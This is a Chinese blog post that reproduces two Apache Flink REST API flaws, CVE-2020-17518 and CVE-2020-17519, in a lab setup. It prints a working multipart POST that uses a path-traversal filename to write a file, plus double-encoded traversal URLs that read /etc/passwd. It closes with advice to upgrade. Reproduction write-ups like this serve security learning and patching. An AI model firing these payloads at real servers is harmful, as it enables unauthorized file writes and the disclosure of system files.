CVE-2020-17518/17519:Apache Flink 文件写入/读取漏洞

最新推荐文章于 2024-02-23 14:54:58 发布
最新推荐文章于 2024-02-23 14:54:58 发布
阅读量427 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/per_se_veran_ce/article/details/112288631
版权

CVE-2020-17518

文件写入

Apache Flink 1.5.1引入了REST处理程序,攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)

版本:Apache:Apache Flink: 1.5.1 - 1.11.2

开启漏洞环境,访问8081端口

在这里插入图片描述

构造POST请求包

Host: 192.168.5.129:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.5.129:8081/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 199

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/CVE-2020-17518"

CVE-2020-17518
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

在这里插入图片描述

写入成功

在这里插入图片描述

访问http://192.168.5.129:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fCVE-2020-17518

在这里插入图片描述

CVE-2020-17519

jobmanager/logs文件读取

Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的)

版本:Apache:Apache Flink: 1.11.0 ,1.11.1,1.11.2

漏洞验证:

访问http://192.168.5.129:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
在这里插入图片描述

修复建议

升级到安全版本:Flink 1.11.3或Flink 1.12.0

per_se_veran_ce
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache Flink -任意文件写入漏洞复现(CVE-2020-17518
0xSec
01-11 1469
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)
写入文件_【漏洞通告】CVE202017518 Apache Flink任意文件写入漏洞
weixin_35353904的博客
01-09 166
0x00漏洞概述产品名称CVE ID类 型漏洞等级远程利用Apache FlinkCVE-2020-17518任意文件写入高危是CVE-2020-17519任意文件读取高危是0x01漏洞详情Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式数据流引擎。2021年01月05日,Apache官方发布安全公告,公开了Apach...
Apache Flink (文件写入漏洞/文件读取漏洞​)CVE-2020-17518/17519
thelostworld
01-15 452
Apache Flink (文件写入漏洞/文件读取漏洞)CVE-2020-17518/17519一、漏洞描述Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。CVE-2020-17518: 文件写入漏洞攻击者利用REST API,可以修改H...
Apache Flink -任意文件写入漏洞CVE-2020-17518
chaojixiaojingang
01-07 4134
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
Apache Flink (文件写入漏洞/文件读取漏洞​)CVE-2020-17518/CVE-2020-17519
thelostworld
01-15 405
Apache Flink (文件写入漏洞/文件读取漏洞) CVE-2020-17518/17519 一、漏洞描述 Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。 CVE-2020-17518: 文件写入漏洞 攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访..
Apache Flink CVE-2020-17518/CVE-2020-17519 文件操作漏洞复现
m0_48520508的博客
01-21 537
0x00简介 Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01漏洞概述 CVE-2020-17519 Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.
Apache Flink CVE-2020-17518-id:L.pdf
最新发布
04-30
### Apache Flink CVE-2020-17518 任意文件写入漏洞详解 #### 漏洞概述 CVE-2020-17518 是一个存在于 Apache Flink 中的安全漏洞,它允许远程攻击者通过 REST API 目录遍历来实现任意文件写入的功能。这一漏洞在 ...
CVE-2020-17519/17518 Apache Flink 文件操作漏洞复现
ximo的博客
03-31 496
简介 Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。 漏洞简介 CVE-2020-17518攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)。 CVE-2020-17519Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问
追洞小组 | 实战CVE-2020-17518漏洞
Ms08067安全实验室
02-23 785
文章来源|MS08067 WEB攻防知识星球本文作者:L(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组一、漏洞名称:Apache Flink 任意文件写入漏洞二、漏洞编号...
Apache Flink CVE-2020-17518/17519
weixin_51387754的博客
11-23 319
漏洞简介 Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 影响版本 CVE-2020-17519 1.11.0 1.11.1 1.11.2 CVE-2020-17518 Flink 1.5.1-1
Linux本地内核提权漏洞复现(CVE-2019-13272)
m0_48520508的博客
01-19 782
0x00简介 在5.1.17之前的Linux内核中,kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve可能允许攻击者控制。 0x01漏洞概述 Linux执行PTRACE_TRACEME函数时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数,但是,对象struct cred的生存周期规则不允许无条.
Apache Flink 文件上传漏洞 (CVE-2020-17518)
qq_50854662的博客
05-22 1249
Apache Flink 文件上传漏洞 (CVE-2020-17518)
Apache Flink任意文件写入(CVE-2020-17518)&任意文件读取(CVE-2020-17519)
qq_43244584的博客
01-26 333
Apache Flink任意文件写入(CVE-2020-17518)&任意文件读取(CVE-2020-17519) 一、简介 ​ Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 二、漏洞概述 ​ Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 三、影响版本 ​ Flink 1.5.1-1.11.2 四、环境搭建 ​ 使用vulhub进行安装 ​ Vulhub地址: ​ http
Docker入门
qq_43440134的博客
09-16 110
Docker 环境linux centos7 Docker就是一个资源之间隔离的容器。 术名: Docker主机:安装了Docker的机器 Docker镜像:打包好的文件 Docker容器:软件运行起来就是一个容器 Docker仓库:放置Docker镜像的仓库 Docker客户端:用来操作Docker的软件 centos7 下安装docker过程 1,Docker 要求 CentOS 系统的内核版本高于 3.10 ,查看本页面的前提条件来验证你的CentOS 版本是否支持 Docker 2,通过 uname
Apache Flink 通过REST API写入远程文件(CVE-2020-17518)
EC_Carrot的博客
06-04 189
漏洞背景 Apache Flink是美国阿帕奇软件(Apache)基金会的一款开源的分布式流数据处理引擎。该产品主要使用Java和Scala语言编写。 影响范围 Flink 1.5.1-1.11.2 漏洞复现 启动环境后访问http://your-ip:8081,能看到页面说明开启成功 发送以下数据包 expload: POST /jars/upload HTTP/1.1 Host: localhost:8081 Accept-Encoding: gzip, deflate Accept: */* Ac
CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞复现
ierciyuan的博客
08-04 869
CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞复现。
Flink两个漏洞复现(CVE-2020-17518&17519
黑白的博客
05-02 609
声明 好好学习,天天向上 漏洞描述 Apache Flink 是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 编号:CVE-2020-17518&17519 Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历和任意文件写入漏洞CVE-2020-17519:攻击者可通过REST API使用…/跳目录实现
Apache Flink 文件上传漏洞CVE-2020-17518
weixin_53639243的博客
02-23 304
Apache Flink 是一个开源的流处理框架,具有强大的流处理和批处理能力。Apache Flink 1.5.1 引入了一个 REST 处理程序,允许您通过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。
CVECVE-2020-17518 & CVE-2020-17519Flink 任意文件上传 & 未授权访问
边扯边淡
05-09 2599
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518CVE-2020-17519Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 未授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值